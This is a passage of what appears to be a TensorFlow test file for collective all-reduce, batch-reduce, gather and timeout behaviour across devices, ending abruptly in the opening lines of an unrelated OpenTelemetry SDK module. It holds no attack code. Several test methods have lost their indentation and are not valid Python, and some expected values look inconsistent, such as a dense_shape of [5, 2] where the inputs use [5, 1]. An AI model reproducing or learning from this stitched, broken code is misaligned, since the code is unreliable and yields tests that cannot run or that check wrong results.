                                                 options.communication_options)
        reduced_values = [self.as_list(v) for v in reduced_values]
        for v in reduced_values:
          self.assertAllEqual(devices, [t.device for t in v])
        return nest.map_structure(ops.convert_to_tensor, reduced_values)

      # Every device is expected to hold the same reduced results.
      per_replica_expect = nest.map_structure(
          lambda x: [ops.convert_to_tensor(x)] * len(devices), expect)

      if "eager" in options.mode:
        got = batch_reduce_fn()
        self.assertAllClose(got, per_replica_expect)

      if "func_graph" in options.mode:
        got = def_function.function(batch_reduce_fn)()
        self.assertAllClose(got, per_replica_expect)

    get_global_mpr(options.num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [1.0, 2.0, 3.0, 4.0]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = 1.0
if group_size == 2:
expect = 3.0 if reduce_op == ReduceOp.SUM else 1.5
elif group_size == 4:
expect = 10.0 if reduce_op == ReduceOp.SUM else 2.5
self.reduce_and_verify(inputs, expect, options)
  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          # TODO(b/166682130): add MEAN reduce once the bug is fixed.
          reduce_op=ReduceOp.SUM,
          prefer_unique_instance_key=[True, False]))
  def testReduceSparse(self, num_processes, required_gpus, implementation,
                       reduce_op, prefer_unique_instance_key):
    """Sparse (IndexedSlices) all-reduce over 1, 2 or 4 replicas."""
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")
    options = self.RunOptions(
        mode=["func_graph"],  # Sparse reduce is not supported in eager.
        num_processes=num_processes,
        gpus_per_process=required_gpus,
        reduce_op=reduce_op,
        communication_options=collective_util.Options(
            implementation=implementation),
        prefer_unique_instance_key=prefer_unique_instance_key)
    group_size = options.num_processes * (options.gpus_per_process or 1)

    inputs_data = [
        IndexedSlicesValue(
            values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[3.], [4.]], indices=[1, 2], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[5.], [6.]], indices=[7, 8], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[7.], [8.]], indices=[3, 2], dense_shape=[10, 1]),
    ]
    inputs = inputs_data[0:group_size]

    # Sparse SUM concatenates slices; duplicate indices stay unmerged.
    if group_size == 1:
      expect = IndexedSlices(
          values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1])
    elif group_size == 2:
      expect = IndexedSlices(
          values=[[1.], [2.], [3.], [4.]],
          indices=[0, 1, 1, 2],
          dense_shape=[10, 1])
    elif group_size == 4:
      expect = IndexedSlices(
          values=[[1.], [2.], [3.], [4.], [5.], [6.], [7.], [8.]],
          indices=[0, 1, 1, 2, 7, 8, 3, 2],
          dense_shape=[10, 1])

    self.reduce_and_verify(inputs, expect, options)
  @combinations.generate(
      combinations.combine(prefer_unique_instance_key=[True, False]))
  def testReduceSparseVariableLength(self, prefer_unique_instance_key):
    """Sparse all-reduce where replicas contribute different row counts."""
    # One device per process, 2 processes, 2 replicas in total.
    inputs = [
        IndexedSlicesValue(values=[[1.]], indices=[0], dense_shape=[10, 1]),
        IndexedSlicesValue(
            values=[[2.], [3.], [4.]], indices=[0, 1, 2], dense_shape=[10, 1]),
    ]
    expect = IndexedSlices(
        values=[[1.], [2.], [3.], [4.]],
        indices=[0, 0, 1, 2],
        dense_shape=[10, 1])
    self.reduce_and_verify(
        inputs,
        expect,
        self.RunOptions(
            mode=["func_graph"],  # Sparse reduce is not supported in eager.
            num_processes=2,
            reduce_op=ReduceOp.SUM,
            prefer_unique_instance_key=prefer_unique_instance_key))
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
prefer_unique_instance_key=[True, False]))
def testBatchReduceDense(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0], [7.0, 8.0]]
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [1.0, 2.0]
if group_size == 2:
expect = [4.0, 6.0] if reduce_op == ReduceOp.SUM else [2.0, 3.0]
elif group_size == 4:
expect = [16.0, 20.0] if reduce_op == ReduceOp.SUM else [4.0, 5.0]
self.batch_reduce_and_verify(inputs, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
# TODO(b/166682130): add MEAN reduce once the bug is fixed.
reduce_op=ReduceOp.SUM,
prefer_unique_instance_key=[True, False]))
def testBatchReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
options = self.RunOptions(
mode=["func_graph"], # Sparse reduce is not supported in eager.
num_processes=num_processes,
gpus_per_process=required_gpus,
reduce_op=reduce_op,
communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = ([
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
])
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [
IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
]
if group_size == 2:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 3, 4],
dense_shape=[5, 1])
]
elif group_size == 4:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
indices=[0, 1, 1, 2, 3, 4, 8, 9],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
indices=[1, 2, 0, 1, 3, 4, 3, 4],
dense_shape=[5, 2])
]
self.batch_reduce_and_verify(inputs, expect, options)
  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
      ))
  def testAllReduceDense(self, num_processes, required_gpus, implementation,
                         reduce_op):
    """Exercises the low-level `_all_reduce` API with dense tensors.

    Runs both a single-value and a batched (tuple) all-reduce inside a
    tf.function on every local device, and checks SUM/MEAN results.
    """
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    def replica_fn():
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      group_size = num_processes * (required_gpus or 1)

      @def_function.function
      def collective_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = constant_op.constant(1.0)
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [1.0 * group_size] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [1.0] * len(devices)
      self.assertAllClose(got, expect)

      @def_function.function
      def collective_batch_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = (constant_op.constant(1.0), constant_op.constant(2.0))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_batch_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [(1.0, 2.0)] * len(devices)
      self.assertAllClose(got, expect)

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
      ))
  def testAllReduceSparse(self, num_processes, required_gpus, implementation,
                          reduce_op):
    """Exercises the low-level `_all_reduce` API with IndexedSlices.

    Runs a single-value and a batched (tuple) sparse all-reduce on every
    local device; results are compared after densifying via
    convert_to_tensor.
    """
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    def replica_fn():
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      group_size = num_processes * (required_gpus or 1)

      @def_function.function
      def collective_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = IndexedSlices(
                values=array_ops.identity([[1.]]),
                indices=array_ops.identity([0]),
                dense_shape=array_ops.identity([5, 1]))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_all_reduce()
      # All replicas contribute the same index, so SUM/MEAN scale the value.
      if reduce_op == ReduceOp.SUM:
        expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
                 ] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
      self.assertAllClose(
          nest.map_structure(ops.convert_to_tensor, got),
          nest.map_structure(ops.convert_to_tensor, expect))

      @def_function.function
      def collective_batch_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = (IndexedSlices(
                array_ops.identity([[1.]]), array_ops.identity([0]),
                array_ops.identity([5, 1])),
                     IndexedSlices(
                         array_ops.identity([[3.]]), array_ops.identity([2]),
                         array_ops.identity([5, 1])))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_batch_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
                   IndexedSlices([[3. * group_size]], [2], [5, 1]))
                 ] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [(IndexedSlices([[1.]], [0], [5, 1]),
                   IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
      self.assertAllClose(
          nest.map_structure(ops.convert_to_tensor, got),
          nest.map_structure(ops.convert_to_tensor, expect))

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=2,
          required_gpus=0,
          implementation=CommunicationImplementation.AUTO,
          reduce_op=ReduceOp.SUM))
  def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
                                       implementation, reduce_op):
    """Batch all-reduce over a structure mixing dense tensors and IndexedSlices."""

    def replica_fn():
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      group_size = num_processes * (required_gpus or 1)

      @def_function.function
      def collective_batch_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            # Interleave sparse and dense components in a single tuple.
            value = (IndexedSlices(
                array_ops.identity([[1.]]), array_ops.identity([0]),
                array_ops.identity([5, 1])), array_ops.identity(1.0),
                     IndexedSlices(
                         array_ops.identity([[3.]]), array_ops.identity([2]),
                         array_ops.identity([5, 1])), array_ops.identity(2.0))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_batch_all_reduce()
      expect = [
          (IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
           IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
      ] * len(devices)
      self.assertAllClose(
          nest.map_structure(ops.convert_to_tensor, got),
          nest.map_structure(ops.convert_to_tensor, expect))

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          axis=[0, 1, 2],
          func_mode=["eager", "func_graph"],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          prefer_unique_instance_key=[True, False]))
  def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
                             func_mode, axis, prefer_unique_instance_key):
    """Gathers identically-shaped per-replica tensors along `axis`."""

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)

      def gather_fn():
        per_replica_value = make_per_replica_value(value, devices)
        gathered_values = collective._gather(
            per_replica_value, per_replica_value, axis=axis, options=options)
        gathered_values = self.as_list(gathered_values)
        # Skip checking devices in eager. In eager the device attribute doesn't
        # reflect the actual device of the tensor.
        if not context.executing_eagerly():
          self.assertAllEqual(devices, [v.device for v in gathered_values])
        return [ops.convert_to_tensor(v) for v in gathered_values]

      group_size = num_processes * (required_gpus or 1)
      # Each replica contributes the same `value`, so the gather equals
      # `value` concatenated group_size times along `axis`.
      expect = array_ops.concat([value] * group_size, axis=axis)
      per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)

      if func_mode == "eager":
        result = gather_fn()
        self.assertAllClose(result, per_replica_expect)

      if func_mode == "func_graph":
        result = def_function.function(gather_fn)()
        self.assertAllClose(result, per_replica_expect)

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[CommunicationImplementation.RING]))
  def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
                                  implementation):
    """Runs a reduce inside tf.cond to exercise collective V2 in control flow."""

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = True
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      value = make_per_replica_value(constant_op.constant([1.]), devices)

      @def_function.function
      def reduce_fn():

        def cond_body():
          reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
                                      options)
          return math_ops.add_n(self.as_list(reduced)) / len(devices)

        # Both branches run the same collective; the predicate is a
        # non-constant tensor so a real If op is built.
        return control_flow_ops.cond(
            array_ops.identity(False), cond_body, cond_body)

      num_replicas = num_processes * len(devices)
      self.assertAllEqual(reduce_fn(), [1. * num_replicas])

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=1,
          required_gpus=2,
          implementation=[
              CommunicationImplementation.NCCL, CommunicationImplementation.RING
          ],
          prefer_unique_instance_key=[True, False]))
  def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes,
                                                    required_gpus,
                                                    implementation,
                                                    prefer_unique_instance_key):
    """Checks that concurrent collectives do not interleave kernel launches."""

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      # We would like to simulate the following sequence:
      #   thread-0  device0  device1
      #   thread-1  device0  device1
      # If the kernel launch sequence is as-is the program will deadlock since
      # NCCL requires the launch order to be same on each device.
      v0 = make_per_replica_value(1.0, devices)
      v1 = make_per_replica_value(2.0, devices)

      # Add a delay to collective_ops.all_reduce according to the input
      # tensor's index in `sequence`, to force the adversarial ordering above.
      sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
      all_reduce = collective_ops.all_reduce

      def delayed_all_reduce(input_tensor, *args, **kwargs):
        for idx, v in enumerate(sequence):
          if input_tensor is v:
            time.sleep(idx)
            break
        return all_reduce(input_tensor, *args, **kwargs)

      with test.mock.patch.object(collective_ops, "all_reduce",
                                  delayed_all_reduce):
        # We only use NCCL for batch reduce with two or more values, so we use
        # two values here.

        def thread_fn():
          reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM,
                                            [(v0, v0), (v0, v0)], options)
          self.assertAllEqual(reduced[0].values, [2.0, 2.0])
          self.assertAllEqual(reduced[1].values, [2.0, 2.0])

        t = threading.Thread(target=thread_fn)
        t.start()
        reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
                                                                     (v1, v1)],
                                          options)
        self.assertAllEqual(reduced[0].values, [4.0, 4.0])
        self.assertAllEqual(reduced[1].values, [4.0, 4.0])
        t.join()

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=1,
          required_gpus=2,
          implementation=[
              CommunicationImplementation.NCCL, CommunicationImplementation.RING
          ],
          prefer_unique_instance_key=[True, False]))
  def testInputsAreFunctionArgs(self, num_processes, required_gpus,
                                implementation, prefer_unique_instance_key):
    """Reduces values passed as tf.function args (no device placement)."""

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)

      @def_function.function
      def reduce_fn(v):
        # Function inputs don't have device placement.
        self.assertEqual(v.values[0].device, "")
        self.assertEqual(v.values[1].device, "")
        # We only use NCCL for batch reduce with two or more values, so we use
        # two values here.
        reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v),
                                                                     (v, v)],
                                          options)
        # Outputs should be placed back on the replica devices.
        self.assertEqual(reduced[0].values[0].device, devices[0])
        self.assertEqual(reduced[0].values[1].device, devices[1])
        self.assertEqual(reduced[1].values[0].device, devices[0])
        self.assertEqual(reduced[1].values[1].device, devices[1])
        # Returning Mirrored only evaluates the primary value, which causes
        # hanging.
        return [reduced[0].values, reduced[1].values]

      v = make_per_replica_value(1.0, devices)
      reduced = reduce_fn(v)
      self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]])

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=2,
          required_gpus=[0, 1],
          implementation=[
              CommunicationImplementation.RING, CommunicationImplementation.NCCL
          ],
          prefer_unique_instance_key=[True, False]))
  def testTimeoutReduceDense(self, num_processes, implementation, required_gpus,
                             prefer_unique_instance_key):
    """A dense reduce launched on only one worker should hit the timeout."""
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, task_id = self.make_collective(
          num_processes, required_gpus)
      # Only worker-0 participates; the other worker returns immediately.
      if task_id != 0:
        return

      v = make_per_replica_value(1.0, devices)
      options = collective_util.Options(
          timeout_seconds=1, implementation=implementation)

      @def_function.function
      def reduce_dense():
        return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)

      # The collective should time out because we only launch it on worker-0,
      # while there're two workers in total.
      with self.assertRaises(errors.DeadlineExceededError):
        reduce_dense()

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=2,
          required_gpus=[0, 1],
          implementation=[
              CommunicationImplementation.RING, CommunicationImplementation.NCCL
          ],
          prefer_unique_instance_key=[True, False]))
  def testTimeoutBatchReduceDense(self, num_processes, implementation,
                                  required_gpus, prefer_unique_instance_key):
    """A dense batch reduce launched on only one worker should time out."""
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, task_id = self.make_collective(
          num_processes, required_gpus)
      # Only worker-0 participates; the other worker returns immediately.
      if task_id != 0:
        return

      v = make_per_replica_value(1.0, devices)
      options = collective_util.Options(
          timeout_seconds=1, implementation=implementation)

      @def_function.function
      def batch_reduce_dense():
        return collective.batch_reduce(reduce_util.ReduceOp.SUM,
                                       [(v, v), (v, v)], options)

      # The collective should time out because we only launch it on worker-0,
      # while there're two workers in total.
      with self.assertRaises(errors.DeadlineExceededError):
        batch_reduce_dense()

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=2,
          required_gpus=[0, 1],
          implementation=[
              CommunicationImplementation.RING, CommunicationImplementation.NCCL
          ],
          prefer_unique_instance_key=[True, False]))
  def testTimeoutReduceSparse(self, num_processes, implementation,
                              required_gpus, prefer_unique_instance_key):
    """A sparse reduce launched on only one worker should hit the timeout."""
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, task_id = self.make_collective(
          num_processes, required_gpus)
      # Only worker-0 participates; the other worker returns immediately.
      if task_id != 0:
        return

      v = make_per_replica_value(
          IndexedSlicesValue(
              values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
      options = collective_util.Options(
          timeout_seconds=1, implementation=implementation)

      @def_function.function
      def reduce_sparse():
        return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)

      # The collective should time out because we only launch it on worker-0,
      # while there're two workers in total.
      with self.assertRaises(errors.DeadlineExceededError):
        reduce_sparse()

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(
      combinations.combine(
          num_processes=2,
          required_gpus=[0, 1],
          implementation=[
              CommunicationImplementation.RING, CommunicationImplementation.NCCL
          ],
          prefer_unique_instance_key=[True, False]))
  def testTimeoutBatchReduceSparse(self, num_processes, required_gpus,
                                   implementation, prefer_unique_instance_key):
    """A sparse batch reduce launched on only one worker should time out."""
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, task_id = self.make_collective(
          num_processes, required_gpus)
      # Only worker-0 participates; the other worker returns immediately.
      if task_id != 0:
        return

      v = make_per_replica_value(
          IndexedSlicesValue(
              values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
      options = collective_util.Options(
          timeout_seconds=1, implementation=implementation)

      @def_function.function
      def batch_reduce_sparse():
        return collective.batch_reduce(reduce_util.ReduceOp.SUM,
                                       [(v, v), (v, v)], options)

      # The collective should time out because we only launch it on worker-0,
      # while there're two workers in total.
      with self.assertRaises(errors.DeadlineExceededError):
        batch_reduce_sparse()

    get_global_mpr(num_processes).run(replica_fn)
  @combinations.generate(combinations.combine(num_processes=1, required_gpus=2))
  def testNcclOrdering(self, num_processes, required_gpus):
    """Verifies NCCL collectives are sequenced deterministically.

    Builds a graph mixing dense/sparse reduces, nested tf.functions, tf.cond
    and tf.while_loop, then checks that on every device all collective ops
    (and the function/If/While ops containing collectives) form a chain in
    the topological order of the graph.
    """

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = True
      CollectiveReplicaLauncher._prefer_ordering_token = True
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(
          implementation=CommunicationImplementation.NCCL)

      v_dense = make_per_replica_value([1.0, 1.0], devices)
      v_sparse = make_per_replica_value([
          IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
          IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
      ], devices)

      @def_function.function
      def nested_dense():
        collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)

      @def_function.function
      def nested_sparse():
        collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)

      # All collectives, function calls, if clause and while loops should be
      # chained by control dependencies, so that the execution order is
      # deterministic.
      @def_function.function
      def f():
        # pylint: disable=pointless-statement
        collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
        # reducing dense value.
        collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
        # reducing sparse value.
        collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
        # reduce dense value in nested tf.function.
        nested_dense()
        # reduce sparse value in nested tf.function.
        nested_sparse()
        # reduce dense value in tf.cond.
        if array_ops.identity(1.0) > array_ops.identity(2.0):
          collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
        else:
          v_dense
        # reduce sparse value in tf.cond.
        if array_ops.identity(1.0) > array_ops.identity(2.0):
          v_sparse
        else:
          collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
                            options)
        # reduce dense value in tf.while_loop.
        i = array_ops.identity(1)
        while i < 3:
          collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
          i += 1
        # reduce sparse value in tf.while_loop.
        i = array_ops.identity(1)
        while i < 3:
          collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
                            options)
          i += 1
        # reducing dense and sparse value again.
        collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
        collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
        # pylint: enable=pointless-statement

      graph = f.get_concrete_function().graph
      should_be_ordered = set([
          "CollectiveReduceV2", "CollectiveGatherV2", "If", "While",
          "StatefulPartitionedCall"
      ])
      nodes_by_device = {}
      for op in graph.get_operations():
        if op.type in should_be_ordered:
          if op.device not in nodes_by_device:
            nodes_by_device[op.device] = []
          nodes_by_device[op.device].append(op)
      order = test_util.topological_sort_operations(graph.get_operations())
      for device in devices:
        device = device_util.canonicalize(device)
        # Those function ops don't have device annotations, but they contain
        # collectives for both devices so we always include them.
        operations = nodes_by_device[device] + nodes_by_device[""]
        # Verify that we get all types of nodes we want.
        self.assertEqual(set(op.type for op in operations), should_be_ordered)
        test_util.assert_sequential_execution(order, operations)

    get_global_mpr(num_processes).run(replica_fn)
if __name__ == "__main__":
  # Set default inter op thread pool size to one to ensure we don't exhaust the
  # thread pool with the additional executors to run collectives in eager.
  os.environ["TF_NUM_INTEROP_THREADS"] = "1"
  # TODO(b/172304955): figure out why logical devices don't work.
  test_util.main(config_logical_devices=False)
|
__init__.py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import sys
import threading
import typing
from enum import Enum
from os import environ, linesep
from typing import Optional
from opentelemetry.context import Context, attach, detach, set_value
from opentelemetry.sdk.environment_variables import (
OTEL_BSP_EXPORT_TIMEOUT,
OTEL_BSP_MAX_EXPORT_BATCH_SIZE,
OTEL_BSP_MAX_QUEUE_SIZE,
